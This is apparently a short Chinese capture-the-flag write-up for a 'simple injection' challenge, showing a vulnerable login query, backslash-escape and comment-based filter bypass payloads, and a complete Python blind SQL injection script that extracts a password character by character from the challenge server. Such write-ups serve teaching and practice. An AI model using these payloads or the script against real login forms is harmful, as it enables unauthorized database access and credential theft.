简单注入

hint.txt拿到数据库查询代码:

select * from users where username='$_POST["username"]' and password='$_POST["password"]';

这个就比较好分析了,提交参数username时,使用反斜杠注释单引号,使用注释绕过空格过滤:

username=admin\&password=/**/or/**/1>0#
username=admin\&password=/**/or/**/1<0#

执行两段话可以得到不一样的回显,很容易想到可以用盲注。

import requests

url = "http://0dafba8b-3cf1-4b74-9b9a-9195b5f5e6b0.node3.buuoj.cn/index.php"


def submit1():
    data = {"username": "admin\\", "password": ""}
    result = ""
    i = 0
    while True:
        i = i + 1
        for j in range(32, 128):
            payload = "or/**/if(ascii(substr(password,%d,1))<%d,1,0)#" % (i, j)
            data['password'] = payload
            response = requests.post(url=url, data=data)

            if "stronger" in response.text:
                result += chr(j - 1)
                print(payload)
                print(result)
                break
            else:
                if j == 127:
                    return result


def submit2():
    data = {"username": "admin\\", "password": ""}
    result = ""
    i = 0
    while True:
        i = i + 1
        head = 32
        tail = 127

        while head < tail:
            mid = (head + tail) >> 1
            payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#" % (i, mid)
            data['password'] = payload
            response = requests.post(url=url, data=data)

            if "stronger" in response.text:
                head = mid + 1
            else:
                tail = mid

        if head != 32:
            result += chr(head)
        else:
            break
        print(result)
    return result


if __name__ == "__main__":
    print(submit1())

Last updated